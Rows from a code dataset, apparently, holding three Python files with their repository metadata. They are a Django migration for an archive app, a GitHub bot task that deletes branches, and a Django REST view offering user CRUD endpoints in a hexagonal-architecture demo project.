WarwickAnimeSoc/aniMango
|
f927c2bc6eb484561ab38172ebebee6f03c8b13b
|
[
"MIT"
] | 6
|
2020-02-07T17:37:37.000Z
|
2021-01-15T00:01:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2018-12-15 20:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archive', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='item',
name='file',
field=models.FileField(help_text=b'The file that should be uploaded', upload_to=b'archive/'),
),
migrations.AlterField(
model_name='item',
name='type',
field=models.CharField(choices=[(b'im', b'Image'), (b'vi', b'Video'), (b'tx', b'Text File'), (b'we', b'Website File')], default=b'tx', max_length=2),
),
]
| 28.884615
| 161
| 0.585885
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archive', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='item',
name='file',
field=models.FileField(help_text=b'The file that should be uploaded', upload_to=b'archive/'),
),
migrations.AlterField(
model_name='item',
name='type',
field=models.CharField(choices=[(b'im', b'Image'), (b'vi', b'Video'), (b'tx', b'Text File'), (b'we', b'Website File')], default=b'tx', max_length=2),
),
]
| true
| true
|
1c4941197e11bced5ec610532458438235e3a434
| 664
|
py
|
Python
|
src/oca_github_bot/tasks/delete_branch.py
|
tafaRU/oca-github-bot
|
4ede8cf4e7ffb6aa0fd02aadcdd53edfb94b211a
|
[
"MIT"
] | null | null | null |
src/oca_github_bot/tasks/delete_branch.py
|
tafaRU/oca-github-bot
|
4ede8cf4e7ffb6aa0fd02aadcdd53edfb94b211a
|
[
"MIT"
] | 1
|
2019-05-28T10:15:24.000Z
|
2019-05-28T10:15:24.000Z
|
src/oca_github_bot/tasks/delete_branch.py
|
tafaRU/oca-github-bot
|
4ede8cf4e7ffb6aa0fd02aadcdd53edfb94b211a
|
[
"MIT"
] | 1
|
2019-06-18T15:17:53.000Z
|
2019-06-18T15:17:53.000Z
|
# Copyright (c) ACSONE SA/NV 2018
# Distributed under the MIT License (http://opensource.org/licenses/MIT).
from .. import github
from ..config import switchable
from ..github import gh_call
from ..queue import getLogger, task
_logger = getLogger(__name__)
@task()
@switchable()
def delete_branch(org, repo, branch, dry_run=False):
with github.repository(org, repo) as gh_repo:
gh_branch = gh_call(gh_repo.ref, f"heads/{branch}")
if dry_run:
_logger.info(f"DRY-RUN delete branch {branch} in {org}/{repo}")
else:
_logger.info(f"deleting branch {branch} in {org}/{repo}")
gh_call(gh_branch.delete)
| 30.181818
| 75
| 0.674699
|
from .. import github
from ..config import switchable
from ..github import gh_call
from ..queue import getLogger, task
_logger = getLogger(__name__)
@task()
@switchable()
def delete_branch(org, repo, branch, dry_run=False):
with github.repository(org, repo) as gh_repo:
gh_branch = gh_call(gh_repo.ref, f"heads/{branch}")
if dry_run:
_logger.info(f"DRY-RUN delete branch {branch} in {org}/{repo}")
else:
_logger.info(f"deleting branch {branch} in {org}/{repo}")
gh_call(gh_branch.delete)
| true
| true
|
1c49418810ea5ca5da0598ff490ca27f6dd4bd50
| 4,785
|
py
|
Python
|
had/app/views/api/v1/persons/phone_api.py
|
eduardolujan/hexagonal_architecture_django
|
8055927cb460bc40f3a2651c01a9d1da696177e8
|
[
"BSD-3-Clause"
] | 6
|
2020-08-09T23:41:08.000Z
|
2021-03-16T22:05:40.000Z
|
had/app/views/api/v1/persons/phone_api.py
|
eduardolujan/hexagonal_architecture_django
|
8055927cb460bc40f3a2651c01a9d1da696177e8
|
[
"BSD-3-Clause"
] | 1
|
2020-10-02T02:59:38.000Z
|
2020-10-02T02:59:38.000Z
|
had/app/views/api/v1/persons/phone_api.py
|
eduardolujan/hexagonal_architecture_django
|
8055927cb460bc40f3a2651c01a9d1da696177e8
|
[
"BSD-3-Clause"
] | 2
|
2021-03-16T22:05:43.000Z
|
2021-04-30T06:35:25.000Z
|
# -*- coding: utf-8 -*-
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny
from modules.shared.infrastructure.serializers.django.serializer_manager import (
SerializerManager as DjangoSerializerManager,
)
from modules.users.infrastructure.serializers.django import (
UserSerializer as DjangoUserSerializer,
GetUserSerializer as DjangoGetUserSerializer,
CreateUserSerializer as DjangoCreateUserSerializer,
)
from modules.shared.infrastructure.log import LoggerDecorator, PyLoggerService
from modules.shared.infrastructure.requests.django import Request as DjangoRequest
from modules.shared.infrastructure.responses.django import RestResponse as DjangoRestResponse
from modules.shared.infrastructure.persistence.django import UnitOfWork as DjangoUnitOfWork
from modules.shared.infrastructure.passwords.django import PasswordCreator as DjangoPasswordCreator
from modules.users.infrastructure.repository.django import (
UserRepository as DjangoUserRepository
)
from modules.users.application.api.v1 import GetUserApi, CreateUserApi, UpdateUserApi, DeleteUserApi
@LoggerDecorator(logger=PyLoggerService(file_path=__file__))
class UserApi(APIView):
# authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [AllowAny]
def get(self, request, _id: str = None):
"""
Get User
@param request:
@type request:
@param _id:
@type _id:
@return:
@rtype:
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
request_serializer_manager = DjangoSerializerManager(DjangoGetUserSerializer)
response_serializer_manager = DjangoSerializerManager(DjangoUserSerializer)
user_get_api = GetUserApi(request,
response,
user_repository,
request_serializer_manager,
response_serializer_manager)
response = user_get_api(_id)
return response
def post(self, request, _id: str = None):
"""
Post User
@param request: request
@type request: response
@param _id: user id
@type _id: int
@return: post response
@rtype: Response
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
unit_of_work = DjangoUnitOfWork()
password_creator = DjangoPasswordCreator()
user_serializer_manager = DjangoSerializerManager(DjangoCreateUserSerializer)
create_user_api = CreateUserApi(request,
response,
user_serializer_manager,
user_repository,
password_creator,
unit_of_work)
response = create_user_api()
return response
def put(self, request, _id: str = None):
"""
Update User
@param request: request
@type request: response
@param _id: user id
@type _id: int
@return: post response
@rtype: Response
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
unit_of_work = DjangoUnitOfWork()
password_creator = DjangoPasswordCreator()
user_serializer_manager = DjangoSerializerManager(DjangoCreateUserSerializer)
update_user_api = UpdateUserApi(request,
response,
user_serializer_manager,
user_repository,
password_creator,
unit_of_work)
response = update_user_api()
return response
def delete(self, request, _id):
"""
Delete user api
@param request:
@type request:
@param _id:
@type _id:
@return:
@rtype:
"""
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
request_serializer_manager = DjangoSerializerManager(DjangoGetUserSerializer)
delete_user_api = DeleteUserApi(request,
response,
request_serializer_manager,
user_repository)
response = delete_user_api(_id)
return response
| 37.97619
| 100
| 0.614629
|
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny
from modules.shared.infrastructure.serializers.django.serializer_manager import (
SerializerManager as DjangoSerializerManager,
)
from modules.users.infrastructure.serializers.django import (
UserSerializer as DjangoUserSerializer,
GetUserSerializer as DjangoGetUserSerializer,
CreateUserSerializer as DjangoCreateUserSerializer,
)
from modules.shared.infrastructure.log import LoggerDecorator, PyLoggerService
from modules.shared.infrastructure.requests.django import Request as DjangoRequest
from modules.shared.infrastructure.responses.django import RestResponse as DjangoRestResponse
from modules.shared.infrastructure.persistence.django import UnitOfWork as DjangoUnitOfWork
from modules.shared.infrastructure.passwords.django import PasswordCreator as DjangoPasswordCreator
from modules.users.infrastructure.repository.django import (
UserRepository as DjangoUserRepository
)
from modules.users.application.api.v1 import GetUserApi, CreateUserApi, UpdateUserApi, DeleteUserApi
@LoggerDecorator(logger=PyLoggerService(file_path=__file__))
class UserApi(APIView):
permission_classes = [AllowAny]
def get(self, request, _id: str = None):
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
request_serializer_manager = DjangoSerializerManager(DjangoGetUserSerializer)
response_serializer_manager = DjangoSerializerManager(DjangoUserSerializer)
user_get_api = GetUserApi(request,
response,
user_repository,
request_serializer_manager,
response_serializer_manager)
response = user_get_api(_id)
return response
def post(self, request, _id: str = None):
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
unit_of_work = DjangoUnitOfWork()
password_creator = DjangoPasswordCreator()
user_serializer_manager = DjangoSerializerManager(DjangoCreateUserSerializer)
create_user_api = CreateUserApi(request,
response,
user_serializer_manager,
user_repository,
password_creator,
unit_of_work)
response = create_user_api()
return response
def put(self, request, _id: str = None):
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
unit_of_work = DjangoUnitOfWork()
password_creator = DjangoPasswordCreator()
user_serializer_manager = DjangoSerializerManager(DjangoCreateUserSerializer)
update_user_api = UpdateUserApi(request,
response,
user_serializer_manager,
user_repository,
password_creator,
unit_of_work)
response = update_user_api()
return response
def delete(self, request, _id):
request = DjangoRequest(request)
response = DjangoRestResponse()
user_repository = DjangoUserRepository()
request_serializer_manager = DjangoSerializerManager(DjangoGetUserSerializer)
delete_user_api = DeleteUserApi(request,
response,
request_serializer_manager,
user_repository)
response = delete_user_api(_id)
return response
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.